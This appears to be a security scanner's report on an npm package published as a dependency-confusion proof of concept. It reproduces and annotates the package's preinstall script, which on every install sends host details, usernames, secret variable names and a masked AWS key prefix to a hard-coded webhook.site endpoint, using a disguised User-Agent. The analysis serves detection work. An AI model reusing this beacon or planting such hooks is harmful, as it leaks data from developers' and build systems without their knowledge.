// npm 패키지
@gutierre0x80/ads.components.button
SECURITY RESEARCH - Dependency Confusion PoC - Red Bull Bug Bounty
버전
1
메인테이너
1
라이선스
MIT
최초 publish
2026-06-03
publisher
gutierre0x80
tarball
1,852 B
AUTO-PUBLISHED·1개 버전 인덱싱됨·최근 publish: 2026-06-03
// exfil path
what is read → where it ships
steals
- ● AWS keys
- ○ home dir
- ○ system info
sends to
- ⇢ https://webhook.site/9781a49c-0325-4c7f-bb83-137f675d8a6f(webhook.site)
// offending code· @1.999.0· 1 file flagged
llm: malicious · 0.95 → 크리덴셜 읽기 (reads-aws-creds) + 외부 전송지 webhook-bin 조합 — 전형적인 유출 패턴. 단, 아래 발췌 코드는 AWS_ACCESS_KEY_ID의 앞 4자만 마스킹하여 전송하고 환경변수는 값이 아닌 이름만 전송한다. 그래도 호스트명·사용자명·내부 npm 레지스트리 URL·설치 중인 패키지명이 외부로 나가므로 dependency confusion 적중 여부를 확인하기에는 충분하다.
- @1.999.0 · AUTO-PUBLISHED · publisher: gutierre0x80 · heuristic 83/100 · static flags 6 · llm malicious (0.95) via fast-track · install-scripts: preinstall · new-publisher: 0d · first-version-of-package · suspicious-description: security-research · reads-aws-creds · reads-env-vars · reads-homedir · reads-system-info · webhook-bin · child-process-spawn
→ 크리덴셜 읽기 (reads-aws-creds) + 외부 전송지 webhook-bin 조합 — 전형적인 유출 패턴.
// offending code · 1 file flagged · patterns: 6
// --- install scripts --- preinstall: `node preinstall.js` --- package/preinstall.js (excerpt) ---
// NOTE(review): this runs as an npm `preinstall` hook, i.e. before any package code is
// ever imported by the consumer. Installing with `--ignore-scripts` (or the
// `ignore-scripts` npm config) would stop it from executing at all, and egress from
// CI runners to webhook.site during `npm install` is a cheap detection signal.
const https = require('https');
const os = require('os');
// Required but never used in this excerpt. The "child-process-spawn" flag on this
// page may come from this require alone or from code outside the excerpt — not
// shown here, so do not assume a shell is spawned.
const cp = require('child_process');
// Hard-coded exfiltration endpoint: a public request bin. Every install beacons here.
const WEBHOOK = 'https://webhook.site/9781a49c-0325-4c7f-bb83-137f675d8a6f';

// Builds the beacon payload from host/process facts plus selected environment data.
// Nothing on disk is read in this excerpt: only os.* calls and process.env are used
// (the page's "home dir" indicator is not supported by the visible code).
function collect() {
  const info = {
    // NOTE(review): the scope here (@rbnaappdev) differs from the package name in
    // the page header (@gutierre0x80/...); the same script appears to be reused
    // across several PoC packages — confirm before attributing.
    pkg: '@rbnaappdev/ads.components.button@1.999.0',
    hostname: os.hostname(),
    user: os.userInfo().username,
    platform: os.platform(),
    arch: os.arch(),
    cwd: process.cwd(),
    node: process.version,
    // env keys that matter in CI/CD
    // Sends the NAMES (not the values) of env vars matching this pattern — an
    // inventory of which secrets exist on the builder, not the secrets themselves.
    env_keys: Object.keys(process.env).filter(k => /aws|secret|token|key|pass|cred|npm|ci|build|deploy/i.test(k) ),
    // AWS creds if present (proves impact)
    // Only the first 4 characters of the access key ID are sent, masked; the prefix
    // alone is typically enough to classify the key type. AWS_SECRET_ACCESS_KEY is
    // never read here.
    AWS_KEY: process.env.AWS_ACCESS_KEY_ID ? process.env.AWS_ACCESS_KEY_ID.slice(0, 4) + '****' : 'not_found',
    // Internal registry URL and the name of the package being installed: exactly what
    // is needed to confirm a dependency-confusion hit and pick follow-up targets.
    npm_config_registry: process.env.npm_config_registry || '',
    npm_package_name: process.env.npm_package_name || '',
  };
  return info;
}

// POSTs the JSON payload to WEBHOOK, fire-and-forget: the response is never read and
// every socket error is swallowed, so blocked egress produces no visible failure.
function beacon(data) {
  const payload = JSON.stringify(data);
  const url = new URL(WEBHOOK);
  const options = {
    hostname: url.hostname,
    // `src=depcnf` tags the hit as a dependency-confusion beacon on the receiving side.
    path: url.pathname + '?' + new URLSearchParams({ src: 'depcnf' }).toString(),
    method: 'POST',
    headers: {
      'Content-Type': 'application/json',
      'Content-Length': Buffer.byteLength(payload),
      // Hard-coded UA so the request blends in with ordinary npm client traffic in
      // proxy logs; the real npm/node versions are not used.
      'User-Agent': 'npm/9.0.0 node/v18.0.0',
    },
  };
  const req = https.request(options, () => {});
  req.on('error', () => {});
  req.write(payload);
  req.end();
}

// Executed unconditionally when the script is loaded, i.e. on every install; the
// empty catch guarantees the install never fails because of the beacon.
try { beacon(collect()); } catch (_) {}
